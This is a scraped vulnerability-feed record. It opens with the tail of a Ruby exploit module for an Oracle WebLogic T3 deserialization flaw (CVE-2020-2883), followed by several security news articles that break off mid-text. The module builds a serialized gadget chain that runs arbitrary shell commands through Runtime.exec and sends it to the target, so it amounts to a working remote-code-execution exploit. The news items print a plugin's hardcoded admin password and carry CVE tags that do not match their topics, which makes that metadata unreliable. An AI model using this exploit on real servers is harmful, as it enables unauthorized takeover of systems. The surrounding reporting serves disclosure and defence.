'636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractExtractor \npayload_obj << '74726163746f722e416273747261637445787472' \npayload_obj << '6163746f72' \npayload_obj << abstract_extractor_uid # SerialVersionUID \npayload_obj << '020001' # Serializable, 1 field \npayload_obj << '490009' # Integer, field name length: 9 \npayload_obj << '6d5f6e546172676574' # m_nTarget \npayload_obj << '7870' \npayload_obj << '00000000' \npayload_obj << '7572' # TC_ARRAY, TC_CLASSDESC \npayload_obj << '0023' # Class name length: 35 \npayload_obj << '5b4c636f6d2e74616e676f736f6c2e7574696c2e' # [Lcom.tangosol.util.ValueExtractor; \npayload_obj << '56616c7565457874726163746f723b' \npayload_obj << '2246204735c4a0fe' # SerialVersionUID \npayload_obj << '020000' \npayload_obj << '7870' \npayload_obj << '00000003' \npayload_obj << '7372' \npayload_obj << '002f' # Class name length: 47 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ReflectionExtractor \npayload_obj << '74726163746f722e5265666c656374696f6e4578' \npayload_obj << '74726163746f72' \npayload_obj << reflection_extractor_uid # SerialVersionUID \npayload_obj << '02000' # Serializable \npayload_obj << reflect_extract_count \npayload_obj << '5b0009' # array, length: 9 \npayload_obj << '6d5f616f506172616d' # m_aoParam \npayload_obj << '740013' # String, length: 19 \npayload_obj << '5b4c6a6176612f6c616e672f4f626a6563743b' # [Ljava/lang/Object; \npayload_obj << add_sect \npayload_obj << '4c0009' # Object, length: 9 \npayload_obj << '6d5f734d6574686f64' # m_sMethod \npayload_obj << '740012' # String, length: 18 \npayload_obj << '4c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String; \npayload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE \npayload_obj << '007e0009' # handle \npayload_obj << '00000000' \npayload_obj << '7572' \npayload_obj << '0013' # Class name length: 19 \npayload_obj << '5b4c6a6176612e6c616e672e4f626a6563743b' # [Ljava.lang.Object; \npayload_obj 
<< '90ce589f1073296c' # SerialVersionUID \npayload_obj << '020000' \npayload_obj << '7870' \npayload_obj << '00000002' \npayload_obj << '74000a' # String, length: 10 \npayload_obj << '67657452756e74696d65' # getRuntime \npayload_obj << '7572' # TC_ARRAY, TC_CLASSDESC \npayload_obj << '0012' # Class name length: 18 \npayload_obj << '5b4c6a6176612e6c616e672e436c6173733b' # [Ljava.lang.Class; \npayload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID \npayload_obj << '020000' # Serializable, no fields \npayload_obj << '7870' \npayload_obj << '00000000' \npayload_obj << add_tc_null \npayload_obj << '740009' # String, length: 9 \npayload_obj << '6765744d6574686f64' # getMethod \npayload_obj << '7371' \npayload_obj << '007e000d' # handle \npayload_obj << '00000000' \npayload_obj << '7571' \npayload_obj << (change_handle? ? '007e0012' : '007e0011') # handle \npayload_obj << '00000002' \npayload_obj << '707571' \npayload_obj << (change_handle? ? '007e0012' : '007e0011') # handle \npayload_obj << '00000000' \npayload_obj << add_tc_null \npayload_obj << '740006' # String, length: 6 \npayload_obj << '696e766f6b65' # invoke \npayload_obj << '7371' \npayload_obj << '007e000d' # handle \npayload_obj << '00000000' \npayload_obj << '7571' \npayload_obj << (change_handle? ? 
'007e0012' : '007e0011') # handle \npayload_obj << '00000001' \npayload_obj << '7572' # TC_ARRAY, TC_CLASSDESC \npayload_obj << '0013' # Class name length: 19 \npayload_obj << '5b4c6a6176612e6c616e672e537472696e673b' # [Ljava.lang.String; \npayload_obj << 'add256e7e91d7b47' # SerialVersionUID \npayload_obj << '020000' \npayload_obj << '7870' \npayload_obj << '00000003' \n \npayload_bin = format_payload(payload_data) \npayload_obj << payload_bin \n \npayload_obj << add_tc_null \npayload_obj << '740004' \npayload_obj << '65786563' # exec \npayload_obj << '7704' \npayload_obj << '00000003' \npayload_obj << '76720011' \npayload_obj << '6a6176612e6c616e672e52756e74696d65' # java.lang.Runtime \npayload_obj << '0000000000000000000000' \npayload_obj << '7870' \npayload_obj << '740001' \npayload_obj << '3178' \nend \n \ndef extractor_comp_uid \ncase @version_no \nwhen Gem::Version.new('12.1.3.0.0') \n'c7ad6d3a676f3c18' \nwhen Gem::Version.new('12.2.1.3.0') \n'fb4ac83df1d72edc' \nelse \n'f9b3bc58cc52cd21' \nend \nend \n \ndef change_handle? 
\n@version_no == Gem::Version.new('12.2.1.3.0') \nend \n \ndef chained_extractor_uid \ncase @version_no \nwhen Gem::Version.new('12.1.3.0.0') \n'889f81b0945d5b7f' \nwhen Gem::Version.new('12.2.1.3.0') \n'06ee10433a4cc4b4' \nelse \n'435b250b72f63db5' \nend \nend \n \ndef abstract_extractor_uid \ncase @version_no \nwhen Gem::Version.new('12.1.3.0.0') \n'658195303e723821' \nwhen Gem::Version.new('12.2.1.3.0') \n'752289ad4d460138' \nelse \n'9b1be18ed70100e5' \nend \nend \n \ndef reflection_extractor_uid \ncase @version_no \nwhen Gem::Version.new('12.1.3.0.0') \n'ee7ae995c02fb4a2' \nwhen Gem::Version.new('12.2.1.3.0') \n'87973791b26429dd' \nelse \n'1f62f564b951b614' \nend \nend \n \ndef reflect_extract_count \ncase @version_no \nwhen Gem::Version.new('12.2.1.3.0') \n'3' \nelse \n'2' \nend \nend \n \ndef add_sect \nsect = '' \n \nif @version_no == Gem::Version.new('12.2.1.3.0') \nsect << '4c0011' # Object, length: 17 \nsect << '6d5f657874726163746f' # m_extractorCached \nsect << '72436163686564' \nsect << '740012' \nsect << '4c6a6176612f6c616e67' # Ljava/lang/Object; \nsect << '2f4f626a6563743b' \nend \n \nsect \nend \n \ndef add_tc_null \nreturn '70' if @version_no == Gem::Version.new('12.2.1.3.0') \n \n'' \nend \n \ndef t3_send(payload_obj) \nprint_status('Sending object...') \n \nrequest_obj = '000009f3' # Original packet length \nrequest_obj << '016501' # CMD_IDENTIFY_REQUEST, flags \nrequest_obj << 'ffffffffffffffff' \nrequest_obj << '00000071' \nrequest_obj << '0000ea60' \nrequest_obj << '00000018432ec6' \nrequest_obj << 'a2a63985b5af7d63e643' \nrequest_obj << '83f42a6d92c9e9af0f94' \nrequest_obj << '72027973720078720178' \nrequest_obj << '720278700000000c0000' \nrequest_obj << '00020000000000000000' \nrequest_obj << '00000001007070707070' \nrequest_obj << '700000000c0000000200' \nrequest_obj << '00000000000000000000' \nrequest_obj << '01007006' \nrequest_obj << 'fe010000' # separator \nrequest_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION \nrequest_obj << 
'7372' # TC_OBJECT, TC_CLASSDESC \nrequest_obj << '001d' # Class name length: 29 \nrequest_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry \nrequest_obj << '6a766d2e436c61737354' \nrequest_obj << '61626c65456e747279' \nrequest_obj << '2f52658157f4f9ed' # SerialVersionUID \nrequest_obj << '0c0000' # flags? \nrequest_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC \nrequest_obj << '0024' # Class name length: 36 \nrequest_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo \nrequest_obj << '6f6d6d6f6e2e696e7465' \nrequest_obj << '726e616c2e5061636b61' \nrequest_obj << '6765496e666f' \nrequest_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID \nrequest_obj << '020009' # Serializable, 9 fields \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d616a6f72' # major \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d696e6f72' # minor \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '70617463685570646174' # patchUpdate \nrequest_obj << '65' \nrequest_obj << '49000c' # Field type: Int, field name length: 12 \nrequest_obj << '726f6c6c696e67506174' # rollingPatch \nrequest_obj << '6368' \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '73657276696365506163' # servicePack \nrequest_obj << '6b' \nrequest_obj << '5a000e' # Field type: Z = Bool, field name length: 14 \nrequest_obj << '74656d706f7261727950' # temporaryPatch \nrequest_obj << '61746368' \nrequest_obj << '4c0009' # Field type: Object, field name length: 9 \nrequest_obj << '696d706c5469746c65' # implTitle \nrequest_obj << '740012' # String, length: 18 \nrequest_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; \nrequest_obj << '2f537472696e673b' \nrequest_obj << '4c000a' # Field type: Object, field name length: 10 \nrequest_obj << '696d706c56656e646f72' # implVendor \nrequest_obj << '71007e0003' # TC_REFERENCE, handle \nrequest_obj << '4c000b' # 
Field type: Object, field name length: 11 \nrequest_obj << '696d706c56657273696f6e' # implVersion \nrequest_obj << '71007e0003' # TC_REFERENCE, handle \nrequest_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL \nrequest_obj << '7702' # TC_ENDBLOCKDATA \nrequest_obj << '000078' \nrequest_obj << 'fe010000' # separator \n \nrequest_obj << payload_obj \n \nrequest_obj << 'fe010000' # separator \nrequest_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION \nrequest_obj << '7372' # TC_OBJECT, TC_CLASSDESC \nrequest_obj << '001d' # Class name length: 29 \nrequest_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry \nrequest_obj << '6a766d2e436c61737354' \nrequest_obj << '61626c65456e747279' \nrequest_obj << '2f52658157f4f9ed' # SerialVersionUID \nrequest_obj << '0c0000' \nrequest_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC \nrequest_obj << '0021' # Class name length: 33 \nrequest_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo \nrequest_obj << '6f6d6d6f6e2e696e7465' \nrequest_obj << '726e616c2e5065657249' \nrequest_obj << '6e666f' \nrequest_obj << '585474f39bc908f1' # SerialVersionUID \nrequest_obj << '020007' # Serializable, 7 fields \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d616a6f72' # major \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d696e6f72' # minor \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '70617463685570646174' # patchUpdate \nrequest_obj << '65' \nrequest_obj << '49000c' # Field type: Int, field name length: 12 \nrequest_obj << '726f6c6c696e67506174' # rollingPatch \nrequest_obj << '6368' \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '73657276696365506163' # servicePack \nrequest_obj << '6b' \nrequest_obj << '5a000e' # Field type: Z = Bool, field name length: 14 \nrequest_obj << '74656d706f7261727950' # temporaryPatch \nrequest_obj << '61746368' \nrequest_obj << '5b0008' 
# Field type: Array, field name length: 8 \nrequest_obj << '7061636b61676573' # packages \nrequest_obj << '740027' # String, length: 39 \nrequest_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo; \nrequest_obj << '2f636f6d6d6f6e2f696e' \nrequest_obj << '7465726e616c2f506163' \nrequest_obj << '6b616765496e666f3b' \nrequest_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC \nrequest_obj << '0024' # Class name length: 36 \nrequest_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo \nrequest_obj << '6f6d6d6f6e2e696e7465' \nrequest_obj << '726e616c2e5665727369' \nrequest_obj << '6f6e496e666f' \nrequest_obj << '972245516452463e' # SerialVersionUID \nrequest_obj << '020003' # Serializable, 3 fields \nrequest_obj << '5b0008' # Field type: Array, field name length: 8 \nrequest_obj << '7061636b61676573' # packages \nrequest_obj << '71007e0003' # TC_REFERENCE, handle \nrequest_obj << '4c000e' # Field type: Object, field name length: 14 \nrequest_obj << '72656c65617365566572' # releaseVersion \nrequest_obj << '73696f6e' \nrequest_obj << '740012' # String, length: 18 \nrequest_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; \nrequest_obj << '2f537472696e673b' \nrequest_obj << '5b0012' # Field type: Array, field name length: 18 \nrequest_obj << '76657273696f6e496e66' # versionInfoAsBytes \nrequest_obj << '6f41734279746573' \nrequest_obj << '740002' # String, length: 2 \nrequest_obj << '5b42' # [B \nrequest_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC \nrequest_obj << '0024' # Class name length: 36 \nrequest_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo \nrequest_obj << '6f6d6d6f6e2e696e7465' \nrequest_obj << '726e616c2e5061636b61' \nrequest_obj << '6765496e666f' \nrequest_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID \nrequest_obj << '020009' # Serializable, 9 fields \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d616a6f72' # major \nrequest_obj << '490005' # Field type: Int, 
field name length: 5 \nrequest_obj << '6d696e6f72' # minor \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '70617463685570646174' # patchUpdate \nrequest_obj << '65' \nrequest_obj << '49000c' # Field type: Int, field name length: 12 \nrequest_obj << '726f6c6c696e67506174' # rollingPatch \nrequest_obj << '6368' \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '73657276696365506163' # servicePack \nrequest_obj << '6b' \nrequest_obj << '5a000e' # Field type: Z = Bool, field name length: 14 \nrequest_obj << '74656d706f7261727950' # temporaryPatch \nrequest_obj << '61746368' \nrequest_obj << '4c0009' # Field type: Object, field name length: 9 \nrequest_obj << '696d706c5469746c65' # implTitle \nrequest_obj << '71007e0005' # TC_REFERENCE, handle \nrequest_obj << '4c000a' # Field type: Object, field name length: 10 \nrequest_obj << '696d706c56656e646f72' # implVendor \nrequest_obj << '71007e0005' # TC_REFERENCE, handle \nrequest_obj << '4c000b' # Field type: Object, field name length: 11 \nrequest_obj << '696d706c56657273696f' # implVersion \nrequest_obj << '6e' \nrequest_obj << '71007e0005' # TC_REFERENCE, handle \nrequest_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL \nrequest_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA \nrequest_obj << 'fe00ff' # separator \nrequest_obj << 'fe010000' \nrequest_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION \nrequest_obj << '7372' # TC_OBJECT, TC_CLASSDESC \nrequest_obj << '0013' # Class name length: 19 \nrequest_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID \nrequest_obj << '6a766d2e4a564d4944' \nrequest_obj << 'dc49c23ede121e2a' # SerialVersionUID \nrequest_obj << '0c0000' \nrequest_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA \nrequest_obj << '4621' \nrequest_obj << '000000000000000000' \nrequest_obj << '09' # length: 9 \nrequest_obj << '3132372e302e312e31' # 127.0.1.1 \nrequest_obj << '000b' # length: 11 \nrequest_obj << 
'75732d6c2d627265656e' # us-l-breens \nrequest_obj << '73' \nrequest_obj << 'a53caff10000000700' \nrequest_obj << '001b59' \nrequest_obj << 'ffffffffffffffffffff' \nrequest_obj << 'ffffffffffffffffffff' \nrequest_obj << 'ffffffff' \nrequest_obj << '0078' \nrequest_obj << 'fe010000' # separator \nrequest_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION \nrequest_obj << '7372' # TC_OBJECT, TC_CLASSDESC \nrequest_obj << '0013' # Class name length: 19 \nrequest_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID \nrequest_obj << '6a766d2e4a564d4944' \nrequest_obj << 'dc49c23ede121e2a' # SerialVersionUID \nrequest_obj << '0c0000' \nrequest_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA \nrequest_obj << '1d0181401281' \nrequest_obj << '34bf427600093132372e' \nrequest_obj << '302e312e31a53caff1' \nrequest_obj << '000000000078' \n \nnew_len = (request_obj.length / 2).to_s(16).rjust(8, '0') \nrequest_obj[0, 8] = new_len \n \nsock.put([request_obj].pack('H*')) \nsleep(1) \nend \n \ndef format_payload(payload_cmd) \nprint_status('Formatting payload...') \npayload_arr = payload_cmd.split(' ', 3) \n \nformatted_payload = '' \npayload_arr.each do |part| \nformatted_payload << '74' # denotes a string \nformatted_payload << part.length.to_s(16).rjust(4, '0') \nformatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join \nend \n \nformatted_payload \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd.prepend('/bin/sh -c ') \ncmd = build_payload_obj(cmd) \n \nt3_send(cmd) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157950/weblogic_deserialize_badattr_extcomp.rb.txt"}], "threatpost": [{"lastseen": "2020-05-05T22:03:33", "description": "A WordPress plugin, Slick Popup, has a serious privilege escalation flaw \u2013 and it has yet to be patched.\n\nWordPress plugin Slick Popup, which has 7,000 active installs and provides a tool for displaying the Contact 
Form 7 as a popup on WordPress websites. However, researchers with Wordfence said that they found a privilege escalation flaw in all versions (up to 1.7.1) of the plugin.\n\n\u201cPer our disclosure policy, we allowed 30 days for resolution of this issue before releasing details to the public,\u201d researchers said in a [Tuesday post](<https://www.wordfence.com/blog/2019/05/privilege-escalation-flaw-present-in-slick-popup-plugin/?utm_source=list&utm_medium=email&utm_campaign=052819&_hsenc=p2ANqtz--58P4Eqw8GNjqJWFsGtKDBtU9ybVVHgKZmezHHjQYszDGSPXPVQHQVScYEoKQZkNDAl3ok7qrnPKTPKgC0lnS5W45ujMl7uiZuS-HJcYQdO6QfcqE&_hsmi=73121550>). Unfortunately, the deadline has passed without a satisfactory patch by the plugin\u2019s developers.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOm Ak Solutions, the developers behind Slick Popup (and several other plugins, including Contact Form 7 Spam Blocker, Floating Icons and more), [have removed the plugin](<https://wordpress.org/plugins/slick-popup/>) from the WordPress plugin repository while dealing with a fix. The developers did not respond to a request for comment from Threatpost on when specifically a patch would be released.\n\nThe flaw stems from two issues in a feature of the plugin that is meant to grant support access to its developers with one click on the dashboard.\n\nFirst, researchers said that the credentials in the administrative account are hardcoded \u2013 so a \u201cuser\u201d account can be simply created with the username \u201cslickpopupteam\u201d and password \u201cOmakPass13#\u201d.\n\n\u201cSince this is a known value in all cases, it\u2019s possible for malicious actors to assemble a list of sites making use of the plugin and occasionally test for the presence of this support user,\u201d researchers said. 
\u201cOnce logged in, they\u2019re free to create other backdoors independent of this user.\u201d\n\nThen, the feature that adds this support user does not check that the user invoking it is an administrator \u2013 meaning that attackers with mere \u201csubscriber\u201d access to the site can create the account and potentially log in as an admin.\n\nThe flaw was disclosed to the developer April 22, and on April 27, the developer acknowledged the issue and said a patch would be released. However, by the public disclosure deadline, a patch had not yet been released.\n\nLuckily, \u201cBecause of the relatively small userbase of the plugin, and the authentication necessary to exploit it, we do not anticipate widespread attack campaigns leveraging this vulnerability,\u201d researchers said.\n\n## WP Database Backup\n\nIn a separate advisory, Wordfence researchers on Tuesday warned that WordPress plugin WP Database Backup also has a vulnerability \u2013 only this flaw has been patched.\n\nWP Database Backup, which has been installed more than 70,000 times, is a WordPress plugin allowing users to create and restore database backups for their websites. However, researchers said in a [Tuesday post](<https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/?utm_source=list&utm_medium=email&utm_campaign=052819&_hsenc=p2ANqtz--58P4Eqw8GNjqJWFsGtKDBtU9ybVVHgKZmezHHjQYszDGSPXPVQHQVScYEoKQZkNDAl3ok7qrnPKTPKgC0lnS5W45ujMl7uiZuS-HJcYQdO6QfcqE&_hsmi=73121550>) that an \u201cunnamed security researcher\u201d had published a proof of concept exploit for an unpatched flaw in the plugin.\n\n\u201cThe vulnerability, which was irresponsibly disclosed to the public before attempting to notify the plugin\u2019s developers, was reported as a plugin configuration change flaw,\u201d said researchers with Wordfence on Tuesday. 
\u201cA proof of concept (PoC) exploit was provided which allowed unauthenticated attackers to modify the destination email address for database backups, potentially putting sensitive information in their hands.\u201d\n\nThe flaw was originally disclosed April 24, and a patch was released on April 30.\n\nResearchers said that they immediately notified the plugin\u2019s developer of the issue, and the flaws have been patched as of version 5.2 of WP Database Backup.\n\nThe flaw stems from the plugin\u2019s internal settings. In unpatched versions of WP Database Backup, an attacker is able to inject operating system commands arbitrarily, which are then executed when the plugin performs a database backup. Injected commands would persist until manually removed, executing each time a backup is run.\n\n\u201cIn today\u2019s post, we detailed a previously undisclosed OS command injection flaw present in the WP Database Backup plugin,\u201d researchers said. \u201cThis flaw has been patched as of version 5.2 and we recommend affected users ensure they\u2019ve updated to the latest available version.\u201d\n\n## Plugin Flaws Continue\n\nPlugin flaws continue to plague WordPress websites. 
According to an Imperva [report](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>), almost all (98 percent) of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or a blog.\n\nOther recent vulnerabilities have been found in WordPress plugins, including Social Warfare, [Yellow Pencil Visual Theme Customizer](<https://threatpost.com/wordpress-yellow-pencil-plugin-exploited/143729/>), and [Yuzo Related Posts](<https://threatpost.com/wordpress-urges-users-to-uninstall-yuzo-plugin-after-flaw-exploited/143710/>).\n\nMore recently, [security researchers](<https://threatpost.com/joomla-and-wordpress-malicious-redirect-code/145068/>) warned owners of Joomla and WordPress websites of a malicious redirect script that is pushing visitors to malicious websites.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. 
Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "cvss3": {}, "published": "2019-05-29T16:01:38", "type": "threatpost", "title": "WordPress Plugin Has Unpatched Privilege Escalation Flaw, Warn Researchers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-2883"], "modified": "2019-05-29T16:01:38", "id": "THREATPOST:402DA10D86DE62C2A50D39DA993A9518", "href": "https://threatpost.com/wordpress-plugin-has-unpatched-privilege-escalation-flaw-warn-researchers/145150/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-05T22:03:29", "description": "Nvidia, which makes gaming-friendly graphics processing units (GPUs), has patched two high-severity flaws in its GeForce Experience software, which could allow denial of service, information disclosure and privilege escalation on impacted systems.\n\nGeForce Experience is software for gamers utilizing Nvidia\u2019s GTX graphics card, which keeps users\u2019 drivers up-to-date, automatically optimizes their game settings and more. All versions of GeForce Experience for Windows prior to 3.19 are affected by the two serious flaws (CVE-2019-5678 and CVE-2019-5676).\n\n\u201cThis update addresses issues that may lead to information disclosure, escalation of privileges, denial of service, or code execution,\u201d Nvidia said in a [Thursday advisory](<https://nvidia.custhelp.com/app/answers/detail/a_id/4806>). 
\u201cTo protect your system, download and install this software update through the GeForce Experience Downloads page.\u201d\n\nThe first vulnerability, CVE-2019-5678, which has a score of 7.8 out of 10 on the CVSS scale (making it high-severity), stems from the Web Helper component in the Display Control Panel of GeForce Experience.\n\nThis component does not properly validate input, meaning that an attacker with local system access can craft potentially malicious input. The input could lead to code execution, denial of service or information disclosure. David Yesland with Rhino Security Labs was credited with finding the flaw \u2013 on Monday, [he posted an analysis of the vulnerability](<https://rhinosecuritylabs.com/application-security/nvidia-rce-cve-2019-5678/>).\n\n\u201cAs far as some more insight into this vulnerability, Nvidia describes this vulnerability as being something that only an attacker with local system access could exploit,\u201d Yesland told Threatpost in an email. \u201cBut as the blog post will show, we have come up with a proof of concept which shows this being exploited through a web browser. The fix for this issue by Nvidia only directly fixed the command injection flaw in the Web Helper but did not fix the fact that you can use our method through the browser to interact with the Web Helper service. So any other flaw found in the Web Helper service could still be exploited in the same way.\u201d\n\nThe second flaw, CVE-2019-5676, exists in the installer software of GeForce Experience, and enables privilege escalation through code execution. 
The attacker would need access on a local system, Nvidia said.\n\n\u201cNVIDIA GeForce Experience installer software contains a vulnerability in which it incorrectly loads Windows system DLLs without validating the path or signature (also known as a binary planting or DLL preloading attack),\u201d said Nvidia.\n\nThis flaw ranks 7.2 out of 10 on the CVSS scale, making it high severity.\n\nMultiple researchers were credited with reporting the issue, including: Kushal Arvind Shah of Fortinet\u2019s FortiGuard Labs; \u0141ukasz \u2018zaeek\u2019; Yasin Soliman; Marius Gabriel Mihai; and Stefan Kanthak.\n\nGeForce Experience also faced a [high-severity bug](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>) in March that could lead to code execution or denial-of-service of products if exploited. Also earlier in March, Google issued [patches](<https://threatpost.com/google-patches-11-critical-bugs-in-march-android-security-bulletin/130273/>) for bugs in NVIDIA components used in Android handsets. 
Two information disclosure bugs, rated high severity, were also patched by NVIDIA.\n\nAnd, earlier this month, Nvidia patched [three vulnerabilities](<https://threatpost.com/nvidia-windows-gamers-gpu-flaws/144595/>) in its Windows GPU display driver that could have enabled information disclosure, denial of service and privilege escalation.\n", "cvss3": {}, "published": "2019-05-31T14:13:09", "type": "threatpost", "title": "Nvidia Fixes High-Severity Flaws in GeForce Experience for Gamers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-5678", "CVE-2020-2883"], "modified": "2019-05-31T14:13:09", "id": "THREATPOST:DE325815FFEDB9A94065913580514DE5", "href": "https://threatpost.com/nvidia-fixes-high-severity-flaws-in-geforce-experience-for-gamers/145222/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-05T22:03:23", "description": "An unpatched vulnerability in smart TVs would allow attackers on the same Wi-Fi network to hijack the TV set to broadcast their own content \u2013 including, potentially, fake emergency broadcast messages.\n\nDiscovered by security researcher Dhiraj Mishra, the flaw (CVE-2019-12477) is found in the SUPRA Smart Cloud TV brand, which is popular in Russia and Eastern Europe. The TVs are mainly sold via [ecommerce sites](<https://www.alibaba.com/showroom/supra-tv.html>), in Russia, China and the United Arab Emirates, according to an online search.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe issue lies in the `openLiveURL()` function, which the TV uses to fetch streaming content. However, it lacks authentication requirements or session management, according to Mishra. 
So, an attacker can trigger the vulnerability by sending a specially crafted request to a static URL, which allows the adversary to inject a remote file.\n\nA proof-of-concept video shows the attack:\n\n\u201cI found this vulnerability initially by source-code review and then by crawling the application, and reading every request helped me to trigger this vulnerability,\u201d Mishra said in his [writeup](<https://www.inputzero.io/2019/06/hacking-smart-tv.html>) on Monday. \u201cSupra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI.\u201d\n\nThe requirement for the attackers to have access to the home Wi-Fi network obviously mitigates the threat to a certain extent. However, the growing tide of internet of things bugs in routers can give attackers remote access to that network. For instance, two models of TP-Link\u2019s budget routers, models TP-Link WR940N and TL-WR941ND, [were recently found to be vulnerable](<https://threatpost.com/tp-link-routers-vulnerable-to-zero-day-buffer-overflow-attack/143575/>) to flaws that allow attackers to take control of both.\n\n\u201cIn the case of these routers, we found a zero-day in the router could allow malicious third parties to take control of the device from a remote location,\u201d wrote Grzegorz Wypych with IBM Research, in April.\n\nMeanwhile, the SUPRA vulnerability remains unpatched; Mishra said that he couldn\u2019t find a way to contact the vendor. 
Threatpost also attempted to uncover contact information for SUPRA with no success.\n\nSmart-TV hijacking is not unheard of; in January, hackers took advantage of vulnerable Chromecast and Google Home devices [to display messages](<https://threatpost.com/hackers-say-they-hijacked-google-smart-tvs-to-promote-pewdiepie/140507/>) on consumer TVs promoting well-known YouTube star PewDiePie.\n\nConsumer Reports in 2018 meanwhile [identified two smart TV models](<https://www.consumerreports.org/tvs/samsung-fixes-smart-tv-security-issue/>) from Samsung and TCL that included bugs that allowed an attacker to take control of targeted TVs. A hacker who exploited these vulnerabilities would be able to take control of the TV and change the channel, turn up the volume and play offensive YouTube videos from anywhere on the planet, the report stated.\n\nOther smart TV bugs have cropped up as well. Last fall for instance, security researchers revealed that [eight Sony Bravia smart TV models](<https://threatpost.com/sony-smart-tv-bug-allows-remote-access-root-privileges/138063/>) are vulnerable to bugs that could allow complete remote code-execution with root privilege. 
A compromised TV could be recruited into a botnet or be used as springboard for additional attacks against devices that shared the same network.\n\nAnd meanwhile, the impact of smart-TV vulnerabilities is growing as more of the sets are deployed.\n\n\u201c[Cybercriminals] increasingly target IoT devices, such as smart TVs, that include always-on connectivity and high-performance GPUs that can be hijacked for malicious purposes,\u201d Tony Loi, Fortinet researcher, explained when describing the Sony flaws.\n", "cvss3": {}, "published": "2019-06-03T16:11:13", "type": "threatpost", "title": "Smart-TV Bug Allows Rogue Broadcasts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-12477", "CVE-2020-2883"], "modified": "2019-06-03T16:11:13", "id": "THREATPOST:2F7D7339CEE076DFDEB67638B6861B63", "href": "https://threatpost.com/smart-tv-bug-rogue-broadcasts/145275/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-05T22:03:21", "description": "The local privilege-escalation (LPE) zero-day bug in Microsoft Task Scheduler, disclosed by SandboxEscaper on Twitter in late May by way of making public a fully functioning exploit, now has a micropatch.\n\nThe interim fix, from 0patch, was issued Tuesday to address [the vulnerability](<https://threatpost.com/windows-zero-day-lpe/144976/>). 
